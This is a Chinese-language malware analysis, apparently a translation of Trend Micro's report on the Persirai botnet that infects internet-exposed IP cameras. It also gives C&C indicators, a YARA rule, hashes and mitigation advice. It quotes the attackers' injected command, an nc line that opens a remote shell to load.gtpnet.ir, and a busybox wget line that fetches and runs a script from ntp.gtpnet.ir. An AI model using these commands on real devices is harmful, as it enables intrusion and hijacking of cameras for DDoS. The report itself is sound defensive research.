趋势科技(Trend Micro)最近发现了一种新型物联网(IoT)僵尸网络,该僵尸网络利用恶意软件 ELF_PERSIRAI.A进行不断传播感染。据分析,目前已有多家原始设备制造商(OEM)的1000多种型号网络摄像头产品受此恶意网络感染,但趋势科技并未透露详细受影响制造商,下一步可能会和相关制造商配合进行感染识别和漏洞修复。这可能是继Mirai和Hajime之后又一波针对IoT设备的新型攻击力量,趋势科技把其命名为Persirai。
趋势科技通过Shodan发现,大约有120,000台网络摄像设备面临感染Persirai的风险,这些设备赤裸裸地暴露在网,极易被攻击者通过其设备80端口入侵Web管理页面,形成感染控制,然而,其设备使用者却对此毫无意识。以下是4月26日的Persirai感染趋势图,从图中可以看出,中国是该类僵尸网络感染的重灾区,仅大陆地区的感染率就高达20.3%。
行为分析
通常,在用户内部网络中,网络摄像头通常可以使用路由器的即插即用(UPnP)协议功能进行端口映射,使得用户可以通过广域网远程访问到设备,而这也带来了感染IoT恶意软件的风险。Persirai正是利用恶意软件ELF_PERSIRAI.A,对暴露在网的网络摄像头进行传播感染:
目前,这种攻击的大部分受影响设备由于未更改默认出厂密码或存在弱口令,攻击者通过密码组合进行大规模的自动化入侵登录,进入网络摄像头的Web管理接口后,通过以下注入命令强制摄像设备连接到一个下载网站执行恶意文件下载:
$(nc load.gtpnet.ir 1234 -e /bin/sh)
之后,远端下载网站将会给出以下命令响应,通知被控制的网络摄像头从域名连接ntp.gtpnet.ir处下载恶意shell脚本文件:
busybox nohup sh -c “killall encoder ;wget http://ntp.gtpnet.ir/wificam.sh -O /tmp/a.sh ;chmod +x /tmp/a.sh ;/tmp/a.sh” > /dev/null 2>&1 &
其中, wificam.sh脚本将会下载并执行以下恶意样本文件,并在所有恶意程序完全执行之后,进行自毁删除。
所有恶意样本程序将会在被控网络摄像设备的内存中运行,同时,将会在被控设备系统的/dev/null目录下生成ftpupdate.sh和ftpupload.sh,以阻止0day漏洞和其它形式对被控设备的攻击。然而,如果被控设备一旦执行重新启动操作,也不能消除此类隐患,恶意软件也将迅速对该设备形成攻击。
C&C控制
网络摄像头一旦被感染控制后,将会与以下C&C服务器执行通信响应:
load.gtpnet.ir
ntp.gtpnet.ir
185.62.189.232
95.85.38.103
接收到C&C服务器的响应信息之后,被控摄像头将会利用前不久公开的一个0day漏洞利用模块,自动对其它网络摄像头发起攻击。不论目标网络摄像设备的密码有多复杂,攻击者都能利用该漏洞获取设备的用户密码文件,进而进行命令注入。以下是该漏洞的一个攻击payload:
当然,被控摄像头还能从C&C服务器处接收对其它网络系统的DDoS攻击指令。值得注意的是,Persirai可以利用SSDP包(简单服务发现协议包),不需要执行IP地址欺骗,就能发起UDP方式的DDoS攻击。以下为其DDoS攻击中使用的特殊“后门”协议:
箭头所指部分标明了被控设备与C&C服务器的通信方式,其中包含了攻击命令和攻击目标的IP地址和端口号。
趋势科技发现的C&C服务器使用了伊朗的.ir后缀域名,而该后缀域名由伊朗某研究机构严格管理,只限伊朗人使用。另外,我们还发现该恶意软件作者使用的一些有意思的波斯语言符号:
我们曾对用来分析的被感染设备尝试进行固件更新,但更新过程中,其更新状态却提示当前固件已经是最新版本。如下图所示:
总结
在Mirai轰轰烈烈成为首个感染IoT设备的恶意软件之后,其代码的开源性特点也会成为未来IoT类恶意软件的可用之处。随着物联网时代的到来,网络犯罪份子将会从传统的NTP和DNS服务中脱离开来,使用IoT设备发起DDoS
攻击。而对普通IoT设备用户来说,其对设备采取的脆弱安全性措施将会加剧物联网安全问题的严重性。
默认密码、出厂密码、弱口令都将会是攻击者进行攻击利用的途径,然而,以上分析中也表明即使是强壮口令也不能免于攻击。除此之外,物联网设备使用者应该采取多种手段来防止攻击,如禁用路由器中的UPNP功能以免于IoT设备和端口的暴露在线、及时更新固件等。当然,IoT安全也不完全是终端用户的事,还需要设备制造商供应商在生产环节把好安全生产关,才能共筑未来物联网安全。
检测Persirai的YARA规则与HASH
YARA规则:
rule Persirai { meta: description = “Detects Persirai Botnet Malware” author = “Tim Yeh” reference = “Internal Research” date = “2017-04-21” hash1 = “f736948bb4575c10a3175f0078a2b5d36cce1aa4cd635307d03c826e305a7489” hash2 = “e0b5c9f874f260c840766eb23c1f69828545d7820f959c8601c41c024044f02c” hash3 = “35317971e346e5b2a8401b2e66b9e62e371ce9532f816cb313216c3647973c32” hash4 = “ff5db7bdb4de17a77bd4a552f50f0e5488281cedc934fc3707833f90484ef66c” hash5 = “ec2c39f1dfb75e7b33daceaeda4dbadb8efd9015a9b7e41d595bb28d2cd0180f”
strings: $x1 = “ftpupload.sh” fullword ascii $x2 = “/dev/misc/watchdog” fullword ascii $x3 = “/dev/watchdog” ascii $x4 = “:52869/picsdesc.xml” fullword ascii $x5 = “npxXoudifFeEgGaACScs” fullword ascii
$s1 = “ftptest.cgi” fullword ascii $s2 = “set_ftp.cgi” fullword ascii $s3 = “2580e538f3723927f1ea2fdb8d57b99e9cc37ced1” fullword ascii $s4 = “023ea8c671c0abf77241886465200cf81b1a2bf5e” fullword ascii
condition: uint16(0) == 0x457f and filesize ( ( 1 of ($x*) and 1 of ($s*) ) or 2 of ($s*) ) }
Persirai利用的恶意软件ELF_PERSIRAI.A SHA256相关哈希值:
d00b79a0b47ae38b2d6fbbf994a2075bc70dc88142536f283e8447ed03917e45
f974695ae560c6f035e089271ee33a84bebeb940be510ab5066ee958932e310a
af4aa29d6e3fce9206b0d21b09b7bc40c3a2128bc5eb02ff239ed2f3549532bb
aa443f81cbba72e1692246b5647a9278040400a86afc8e171f54577dc9324f61
4a5ff1def77deb11ddecd10f96e4a1de69291f2f879cd83186c6b3fc20bb009a
44620a09441305f592fb65d606958611f90e85b62b7ef7149e613d794df3a778
a58769740a750a8b265df65a5b143a06972af2e7d82c5040d908e71474cbaf92
7d7aaa8c9a36324a2c5e9b0a3440344502f28b90776baa6b8dac7ac88a83aef0
4a5d00f91a5bb2b6b89ccdabc6c13eab97ede5848275513ded7dfd5803b1074b
264e5a7ce9ca7ce7a495ccb02e8f268290fcb1b3e1b05f87d3214b26b0ea9adc
ff5db7bdb4de17a77bd4a552f50f0e5488281cedc934fc3707833f90484ef66c
ec2c39f1dfb75e7b33daceaeda4dbadb8efd9015a9b7e41d595bb28d2cd0180f
f736948bb4575c10a3175f0078a2b5d36cce1aa4cd635307d03c826e305a7489
e0b5c9f874f260c840766eb23c1f69828545d7820f959c8601c41c024044f02c
35317971e346e5b2a8401b2e66b9e62e371ce9532f816cb313216c3647973c32
| 
